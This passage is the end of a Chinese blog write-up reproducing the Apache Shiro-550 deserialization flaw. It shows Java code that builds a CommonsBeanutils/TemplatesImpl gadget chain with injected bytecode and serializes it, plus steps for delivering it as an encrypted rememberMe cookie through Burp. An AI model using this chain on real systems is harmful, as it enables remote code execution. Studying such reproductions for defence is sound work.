TemplatesImpl templates = new TemplatesImpl();</span><br><span class="line">    Class tc = templates.getClass();</span><br><span class="line">    Field nameField = tc.getDeclaredField(&quot;_name&quot;);</span><br><span class="line">    nameField.setAccessible(true);</span><br><span class="line">    nameField.set(templates, &quot;aaaa&quot;);</span><br><span class="line">    Field bytecodesField = tc.getDeclaredField(&quot;_bytecodes&quot;);</span><br><span class="line">    bytecodesField.setAccessible(true);</span><br><span class="line">    bytecodesField.set(templates, new byte[][] &#123;fileData&#125;);</span><br><span class="line"></span><br><span class="line">    //CB</span><br><span class="line">    BeanComparator beanComparator = new BeanComparator(&quot;outputProperties&quot;,new AttrCompare());// 避免CB原生设计中对CC的依赖</span><br><span class="line"></span><br><span class="line">    //CC2</span><br><span class="line">    TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));</span><br><span class="line">    PriorityQueue&lt;Object&gt; priorityQueue = new PriorityQueue&lt;Object&gt;(1,transformingComparator);</span><br><span class="line">    priorityQueue.add(templates);</span><br><span class="line">    priorityQueue.add(2);</span><br><span class="line">    Class&lt;PriorityQueue&gt; c = PriorityQueue.class;</span><br><span class="line">    Field comparatorField = c.getDeclaredField(&quot;comparator&quot;);</span><br><span class="line">    comparatorField.setAccessible(true);</span><br><span class="line">    comparatorField.set(priorityQueue,beanComparator);</span><br><span class="line"></span><br><span class="line">    //序列化保存成文件</span><br><span class="line">    byte[] ser = ysoserial.Serializer.serialize(priorityQueue);</span><br><span class="line">    FileOutputStream fos = new FileOutputStream(&quot;D:\\Code\\Java\\shiro\\Tester\\src\\main\\java\\ser.bin&quot;);</span><br><span class="line">    fos.write(ser);</span><br><span class="line">    fos.flush();</span><br><span class="line">    fos.close();</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>用python脚本加密生成rememberme字符串，在burp中修改rememberme，触发弹窗</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220410172553212.png"></p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1uf4y1T7Rq">https://www.bilibili.com/video/BV1uf4y1T7Rq</a></p>
<p><a target="_blank" rel="noopener" href="http://myblog.ac.cn/archives/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AE%9E%E6%88%98%E4%B9%8Bshiro550#MtCkyNAn">http://myblog.ac.cn/archives/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AE%9E%E6%88%98%E4%B9%8Bshiro550#MtCkyNAn</a></p>
<h1 id="todo"><a href="#todo" class="headerlink" title="todo"></a>todo</h1><h2 id="CommonCollectionsK1"><a href="#CommonCollectionsK1" class="headerlink" title="CommonCollectionsK1"></a>CommonCollectionsK1</h2><h2 id="JRMP绕过限制"><a href="#JRMP绕过限制" class="headerlink" title="JRMP绕过限制"></a>JRMP绕过限制</h2></div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Credink</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://credink.github.io/2022/04/10/shiro550分析/">https://credink.github.io/2022/04/10/shiro550分析/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/shiro/">shiro</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2022/04/17/S2-062%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><i class="fa fa-chevron-left">  </i><span>S2-062(CVE-2021-31805)漏洞复现</span></a></div><div class="next-post pull-right"><a href="/2022/03/26/%E5%90%91%E6%97%A5%E8%91%B5RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span>向日葵RCE漏洞复现</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/img/background.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2022 - 2022 By Credink</div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>